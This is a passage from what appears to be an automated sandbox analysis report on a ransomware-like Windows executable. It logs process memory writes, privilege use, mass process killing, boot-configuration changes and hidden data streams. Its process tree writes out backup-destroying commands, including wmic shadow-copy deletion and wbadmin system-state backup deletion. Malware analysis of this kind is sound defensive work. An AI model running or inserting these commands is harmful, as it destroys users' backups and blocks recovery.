D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 208 PID 1064 wrote to memory of 1256 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 208 PID 1064 wrote to memory of 1256 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 208 PID 1256 wrote to memory of 316 1256 cmd.exe 210 PID 1256 wrote to memory of 316 1256 cmd.exe 210 PID 1256 wrote to memory of 316 1256 cmd.exe 210 PID 1064 wrote to memory of 1392 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 211 PID 1064 wrote to memory of 1392 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 211 PID 1064 wrote to memory of 1392 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 211 PID 1392 wrote to memory of 1656 1392 cmd.exe 213 PID 1392 wrote to memory of 1656 1392 cmd.exe 213 PID 1392 wrote to memory of 1656 1392 cmd.exe 213 PID 1064 wrote to memory of 1692 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 214 PID 1064 wrote to memory of 1692 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 214 PID 1064 wrote to memory of 1692 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 214 PID 1692 wrote to memory of 1588 1692 cmd.exe 216 PID 1692 wrote to memory of 1588 1692 cmd.exe 216 PID 1692 wrote to memory of 1588 1692 cmd.exe 216 PID 1064 wrote to memory of 1920 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 217 PID 1064 wrote to memory of 1920 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 217 PID 1064 wrote to memory of 1920 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 217 PID 1920 wrote to memory of 468 1920 cmd.exe 219 PID 1920 wrote to memory of 468 1920 cmd.exe 219 PID 1920 wrote to memory of 468 1920 cmd.exe 219 PID 1064 wrote to memory of 840 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 220 PID 1064 wrote to memory of 840 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 220 PID 1064 wrote to memory of 840 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 220 PID 840 wrote to memory of 1880 840 cmd.exe 222 PID 840 wrote to memory of 1880 840 cmd.exe 222 PID 840 wrote to memory of 1880 840 cmd.exe 222 PID 1064 wrote to memory of 1916 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 223 PID 1064 wrote to memory of 1916 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 223 PID 1064 wrote to memory of 1916 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 223 PID 1916 wrote to memory of 1932 1916 cmd.exe 225 PID 1916 wrote to memory of 1932 1916 cmd.exe 225 PID 1916 wrote to memory of 1932 1916 cmd.exe 225 PID 1064 wrote to memory of 1924 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 226 PID 1064 wrote to memory of 1924 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 226 PID 1064 wrote to memory of 1924 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 226 PID 1924 wrote to memory of 2020 1924 cmd.exe 228 PID 1924 wrote to memory of 2020 1924 cmd.exe 228 PID 1924 wrote to memory of 2020 1924 cmd.exe 228 PID 1064 wrote to memory of 1988 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 229 PID 1064 wrote to memory of 1988 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 229 PID 1064 wrote to memory of 1988 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 229 PID 1988 wrote to memory of 1424 1988 cmd.exe 231 PID 1988 wrote to memory of 1424 1988 cmd.exe 231 PID 1988 wrote to memory of 1424 1988 cmd.exe 231 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 232 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 232 PID 1064 wrote to memory of 836 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 232 PID 836 wrote to memory of 1512 836 cmd.exe 234 PID 836 wrote to memory of 1512 836 cmd.exe 234 PID 836 wrote to memory of 1512 836 cmd.exe 234 PID 1064 wrote to memory of 1528 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 235 PID 1064 wrote to memory of 1528 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 235 PID 1064 wrote to memory of 1528 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 235 PID 1528 wrote to memory of 1524 1528 cmd.exe 237 PID 1528 wrote to memory of 1524 1528 cmd.exe 237 PID 1528 wrote to memory of 1524 1528 cmd.exe 237 PID 1064 wrote to memory of 1856 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 238 PID 1064 wrote to memory of 1856 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 238 PID 1064 wrote to memory of 1856 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 238 PID 1856 wrote to memory of 1616 1856 cmd.exe 240 PID 1856 wrote to memory of 1616 1856 cmd.exe 240 PID 1856 wrote to memory of 1616 1856 cmd.exe 240 PID 1064 wrote to memory of 1808 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 241 PID 1064 wrote to memory of 1808 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 241 PID 1064 wrote to memory of 1808 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 241 PID 1808 wrote to memory of 520 1808 cmd.exe 243 PID 1808 wrote to memory of 520 1808 cmd.exe 243 PID 1808 wrote to memory of 520 1808 cmd.exe 243 PID 1064 wrote to memory of 1912 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 244 PID 1064 wrote to memory of 1912 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 244 PID 1064 wrote to memory of 1912 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 244 PID 1912 wrote to memory of 1352 1912 cmd.exe 246 PID 1912 wrote to memory of 1352 1912 cmd.exe 246 PID 1912 wrote to memory of 1352 1912 cmd.exe 246 PID 1064 wrote to memory of 1904 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 247 PID 1064 wrote to memory of 1904 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 247 PID 1064 wrote to memory of 1904 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 247 PID 1904 wrote to memory of 1608 1904 cmd.exe 249 PID 1904 wrote to memory of 1608 1904 cmd.exe 249 PID 1904 wrote to memory of 1608 1904 cmd.exe 249 PID 1064 wrote to memory of 1028 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 250 PID 1064 wrote to memory of 1028 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 250 PID 1064 wrote to memory of 1028 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 250 PID 1028 wrote to memory of 1884 1028 cmd.exe 252 PID 1028 wrote to memory of 1884 1028 cmd.exe 252 PID 1028 wrote to memory of 1884 1028 cmd.exe 252 PID 1064 wrote to memory of 576 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 253 PID 1064 wrote to memory of 576 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 253 PID 1064 wrote to memory of 576 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 253 PID 576 wrote to memory of 1560 576 cmd.exe 255 PID 576 wrote to memory of 1560 576 cmd.exe 255 PID 576 wrote to memory of 1560 576 cmd.exe 255 PID 1064 wrote to memory of 2040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 256 PID 1064 wrote to memory of 2040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 256 PID 1064 wrote to memory of 2040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 256 PID 2040 wrote to memory of 1964 2040 cmd.exe 258 PID 2040 wrote to memory of 1964 2040 cmd.exe 258 PID 2040 wrote to memory of 1964 2040 cmd.exe 258 PID 1064 wrote to memory of 984 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 259 PID 1064 wrote to memory of 984 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 259 PID 1064 wrote to memory of 984 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 259 PID 984 wrote to memory of 2032 984 cmd.exe 261 PID 984 wrote to memory of 2032 984 cmd.exe 261 PID 984 wrote to memory of 2032 984 cmd.exe 261 PID 1064 wrote to memory of 228 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 262 PID 1064 wrote to memory of 228 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 262 PID 1064 wrote to memory of 228 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 262 PID 228 wrote to memory of 2000 228 cmd.exe 264 PID 228 wrote to memory of 2000 228 cmd.exe 264 PID 228 wrote to memory of 2000 228 cmd.exe 264 PID 1064 wrote to memory of 1828 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 265 PID 1064 wrote to memory of 1828 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 265 PID 1064 wrote to memory of 1828 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 265 PID 1828 wrote to memory of 1116 1828 cmd.exe 267 PID 1828 wrote to memory of 1116 1828 cmd.exe 267 PID 1828 wrote to memory of 1116 1828 cmd.exe 267 PID 1064 wrote to memory of 1360 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 268 PID 1064 wrote to memory of 1360 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 268 PID 1064 wrote to memory of 1360 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 268 PID 1360 wrote to memory of 1312 1360 cmd.exe 270 PID 1360 wrote to memory of 1312 1360 cmd.exe 270 PID 1360 wrote to memory of 1312 1360 cmd.exe 270 PID 1064 wrote to memory of 1260 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 271 PID 1064 wrote to memory of 1260 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 271 PID 1064 wrote to memory of 1260 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 271 PID 1260 wrote to memory of 236 1260 cmd.exe 273 PID 1260 wrote to memory of 236 1260 cmd.exe 273 PID 1260 wrote to memory of 236 1260 cmd.exe 273 PID 1064 wrote to memory of 1584 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 274 PID 1064 wrote to memory of 1584 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 274 PID 1064 wrote to memory of 1584 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 274 PID 1584 wrote to memory of 1256 1584 cmd.exe 276 PID 1584 wrote to memory of 1256 1584 cmd.exe 276 PID 1584 wrote to memory of 1256 1584 cmd.exe 276 PID 1064 wrote to memory of 268 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 277 PID 1064 wrote to memory of 268 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 277 PID 1064 wrote to memory of 268 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 277 PID 268 wrote to memory of 1912 268 cmd.exe 279 PID 268 wrote to memory of 1912 268 cmd.exe 279 PID 268 wrote to memory of 1912 268 cmd.exe 279 PID 1064 wrote to memory of 1592 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 280 PID 1064 wrote to memory of 1592 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 280 PID 1064 wrote to memory of 1592 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 280 PID 1592 wrote to memory of 1692 1592 cmd.exe 282 PID 1592 wrote to memory of 1692 1592 cmd.exe 282 PID 1592 wrote to memory of 1692 1592 cmd.exe 282 PID 1064 wrote to memory of 2024 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 283 PID 1064 wrote to memory of 2024 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 283 PID 1064 wrote to memory of 2024 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 283 PID 2024 wrote to memory of 1920 2024 cmd.exe 285 PID 2024 wrote to memory of 1920 2024 cmd.exe 285 PID 2024 wrote to memory of 1920 2024 cmd.exe 285 PID 1064 wrote to memory of 284 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 286 PID 1064 wrote to memory of 284 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 286 PID 1064 wrote to memory of 284 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 286 PID 284 wrote to memory of 576 284 cmd.exe 288 PID 284 wrote to memory of 576 284 cmd.exe 288 PID 284 wrote to memory of 576 284 cmd.exe 288 PID 1064 wrote to memory of 308 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 289 PID 1064 wrote to memory of 308 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 289 PID 1064 wrote to memory of 308 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 289 PID 308 wrote to memory of 2040 308 cmd.exe 291 PID 308 wrote to memory of 2040 308 cmd.exe 291 PID 308 wrote to memory of 2040 308 cmd.exe 291 PID 1064 wrote to memory of 1500 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 292 PID 1064 wrote to memory of 1500 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 292 PID 1064 wrote to memory of 1500 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 292 PID 1500 wrote to memory of 1952 1500 cmd.exe 294 PID 1500 wrote to memory of 1952 1500 cmd.exe 294 PID 1500 wrote to memory of 1952 1500 cmd.exe 294 PID 1064 wrote to memory of 1720 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 295 PID 1064 wrote to memory of 1720 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 295 PID 1064 wrote to memory of 1720 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 295 PID 1720 wrote to memory of 1308 1720 cmd.exe 297 PID 1720 wrote to memory of 1308 1720 cmd.exe 297 PID 1720 wrote to memory of 1308 1720 cmd.exe 297 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 298 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 298 PID 1064 wrote to memory of 1536 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 298 PID 1536 wrote to memory of 836 1536 cmd.exe 300 PID 1536 wrote to memory of 836 1536 cmd.exe 300 PID 1536 wrote to memory of 836 1536 cmd.exe 300 PID 1064 wrote to memory of 204 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 301 PID 1064 wrote to memory of 204 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 301 PID 1064 wrote to memory of 204 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 301 PID 204 wrote to memory of 1360 204 cmd.exe 303 PID 204 wrote to memory of 1360 204 cmd.exe 303 PID 204 wrote to memory of 1360 204 cmd.exe 303 PID 1064 wrote to memory of 1496 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 304 PID 1064 wrote to memory of 1496 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 304 PID 1064 wrote to memory of 1496 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 304 PID 1496 wrote to memory of 1856 1496 cmd.exe 306 PID 1496 wrote to memory of 1856 1496 cmd.exe 306 PID 1496 wrote to memory of 1856 1496 cmd.exe 306 PID 1064 wrote to memory of 432 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 307 PID 1064 wrote to memory of 432 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 307 PID 1064 wrote to memory of 432 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 307 PID 432 wrote to memory of 1584 432 cmd.exe 309 PID 432 wrote to memory of 1584 432 cmd.exe 309 PID 432 wrote to memory of 1584 432 cmd.exe 309 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 310 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 310 PID 1064 wrote to memory of 1672 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 310 PID 1672 wrote to memory of 1876 1672 cmd.exe 312 PID 1672 wrote to memory of 1876 1672 cmd.exe 312 PID 1672 wrote to memory of 1876 1672 cmd.exe 312 PID 1064 wrote to memory of 1644 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 313 PID 1064 wrote to memory of 1644 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 313 PID 1064 wrote to memory of 1644 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 313 PID 1644 wrote to memory of 1904 1644 cmd.exe 315 PID 1644 wrote to memory of 1904 1644 cmd.exe 315 PID 1644 wrote to memory of 1904 1644 cmd.exe 315 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 316 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 316 PID 1064 wrote to memory of 1636 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 316 PID 1636 wrote to memory of 1028 1636 cmd.exe 318 PID 1636 wrote to memory of 1028 1636 cmd.exe 318 PID 1636 wrote to memory of 1028 1636 cmd.exe 318 PID 1064 wrote to memory of 1040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 319 PID 1064 wrote to memory of 1040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 319 PID 1064 wrote to memory of 1040 1064 D4D32E7583B3FD8363DED73C91ED3D08.bin.exe 319 PID 1040 wrote to memory of 580 1040 cmd.exe 321 PID 1040 wrote to memory of 580 1040 cmd.exe 321 PID 1040 wrote to memory of 580 1040 cmd.exe 321 -
Suspicious use of AdjustPrivilegeToken 131 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1440 WMIC.exe Token: SeSecurityPrivilege 1440 WMIC.exe Token: SeTakeOwnershipPrivilege 1440 WMIC.exe Token: SeLoadDriverPrivilege 1440 WMIC.exe Token: SeSystemProfilePrivilege 1440 WMIC.exe Token: SeSystemtimePrivilege 1440 WMIC.exe Token: SeProfSingleProcessPrivilege 1440 WMIC.exe Token: SeIncBasePriorityPrivilege 1440 WMIC.exe Token: SeCreatePagefilePrivilege 1440 WMIC.exe Token: SeBackupPrivilege 1440 WMIC.exe Token: SeRestorePrivilege 1440 WMIC.exe Token: SeShutdownPrivilege 1440 WMIC.exe Token: SeDebugPrivilege 1440 WMIC.exe Token: SeSystemEnvironmentPrivilege 1440 WMIC.exe Token: SeRemoteShutdownPrivilege 1440 WMIC.exe Token: SeUndockPrivilege 1440 WMIC.exe Token: SeManageVolumePrivilege 1440 WMIC.exe Token: 33 1440 WMIC.exe Token: 34 1440 WMIC.exe Token: 35 1440 WMIC.exe Token: SeIncreaseQuotaPrivilege 1440 WMIC.exe Token: SeSecurityPrivilege 1440 WMIC.exe Token: SeTakeOwnershipPrivilege 1440 WMIC.exe Token: SeLoadDriverPrivilege 1440 WMIC.exe Token: SeSystemProfilePrivilege 1440 WMIC.exe Token: SeSystemtimePrivilege 1440 WMIC.exe Token: SeProfSingleProcessPrivilege 1440 WMIC.exe Token: SeIncBasePriorityPrivilege 1440 WMIC.exe Token: SeCreatePagefilePrivilege 1440 WMIC.exe Token: SeBackupPrivilege 1440 WMIC.exe Token: SeRestorePrivilege 1440 WMIC.exe Token: SeShutdownPrivilege 1440 WMIC.exe Token: SeDebugPrivilege 1440 WMIC.exe Token: SeSystemEnvironmentPrivilege 1440 WMIC.exe Token: SeRemoteShutdownPrivilege 1440 WMIC.exe Token: SeUndockPrivilege 1440 WMIC.exe Token: SeManageVolumePrivilege 1440 WMIC.exe Token: 33 1440 WMIC.exe Token: 34 1440 WMIC.exe Token: 35 1440 WMIC.exe Token: SeBackupPrivilege 532 vssvc.exe Token: SeRestorePrivilege 532 vssvc.exe Token: SeAuditPrivilege 532 vssvc.exe Token: SeDebugPrivilege 984 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 1836 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 1040 taskkill.exe Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 1116 taskkill.exe Token: SeDebugPrivilege 204 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 224 taskkill.exe Token: SeDebugPrivilege 1320 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 536 taskkill.exe Token: SeDebugPrivilege 284 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeDebugPrivilege 1836 taskkill.exe Token: SeDebugPrivilege 1664 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 236 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 1660 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 1636 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 212 taskkill.exe Token: SeDebugPrivilege 1396 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 824 taskkill.exe Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 1656 taskkill.exe Token: SeDebugPrivilege 1588 taskkill.exe Token: SeDebugPrivilege 468 taskkill.exe Token: SeDebugPrivilege 1880 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 1616 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 1560 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 1116 taskkill.exe Token: SeDebugPrivilege 1312 taskkill.exe Token: SeDebugPrivilege 236 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 1692 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 576 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1308 taskkill.exe Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 1360 taskkill.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1876 taskkill.exe Token: SeDebugPrivilege 1904 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 580 taskkill.exe -
pid Process 1260 wbadmin.exe 1648 wbadmin.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1588 bcdedit.exe 1876 bcdedit.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1964 vssadmin.exe -
Kills process with taskkill 91 IoCs
pid Process 1572 taskkill.exe 1476 taskkill.exe 212 taskkill.exe 1312 taskkill.exe 1600 taskkill.exe 1868 taskkill.exe 316 taskkill.exe 1608 taskkill.exe 1948 taskkill.exe 2032 taskkill.exe 1352 taskkill.exe 1952 taskkill.exe 836 taskkill.exe 1828 taskkill.exe 1508 taskkill.exe 432 taskkill.exe 1256 taskkill.exe 1308 taskkill.exe 2032 taskkill.exe 1424 taskkill.exe 1560 taskkill.exe 1644 taskkill.exe 1256 taskkill.exe 536 taskkill.exe 1536 taskkill.exe 236 taskkill.exe 1964 taskkill.exe 2040 taskkill.exe 1584 taskkill.exe 1928 taskkill.exe 1944 taskkill.exe 1660 taskkill.exe 468 taskkill.exe 1616 taskkill.exe 1512 taskkill.exe 1524 taskkill.exe 1884 taskkill.exe 1912 taskkill.exe 284 taskkill.exe 1836 taskkill.exe 1944 taskkill.exe 1476 taskkill.exe 2032 taskkill.exe 2000 taskkill.exe 984 taskkill.exe 1712 taskkill.exe 1764 taskkill.exe 1396 taskkill.exe 204 taskkill.exe 824 taskkill.exe 1932 taskkill.exe 2020 taskkill.exe 580 taskkill.exe 1828 taskkill.exe 1988 taskkill.exe 1956 taskkill.exe 1912 taskkill.exe 1028 taskkill.exe 836 taskkill.exe 1564 taskkill.exe 1876 taskkill.exe 1836 taskkill.exe 1320 taskkill.exe 1508 taskkill.exe 1664 taskkill.exe 1536 taskkill.exe 1116 taskkill.exe 576 taskkill.exe 1116 taskkill.exe 1660 taskkill.exe 1940 taskkill.exe 1256 taskkill.exe 520 taskkill.exe 1952 taskkill.exe 1636 taskkill.exe 1656 taskkill.exe 2028 taskkill.exe 1884 taskkill.exe 1696 taskkill.exe 224 taskkill.exe 1608 taskkill.exe 1880 taskkill.exe 236 taskkill.exe 1920 taskkill.exe 1360 taskkill.exe 1904 taskkill.exe 1040 taskkill.exe 1600 taskkill.exe 1856 taskkill.exe 1588 taskkill.exe 1692 taskkill.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:sgewszqwu D4D32E7583B3FD8363DED73C91ED3D08.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:ddmdnjamzhispuay D4D32E7583B3FD8363DED73C91ED3D08.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:sgewszqwu D4D32E7583B3FD8363DED73C91ED3D08.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:datnfamalhsmqxgef D4D32E7583B3FD8363DED73C91ED3D08.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:ouwvwpdmzxnjq D4D32E7583B3FD8363DED73C91ED3D08.bin.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\D4D32E7583B3FD8363DED73C91ED3D08.bin.exe"C:\Users\Admin\AppData\Local\Temp\D4D32E7583B3FD8363DED73C91ED3D08.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
- NTFS ADS
PID:1064 -
C:\Windows\system32\cmd.execmd /C wmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY DELETE /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
-
C:\Windows\system32\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1260
-
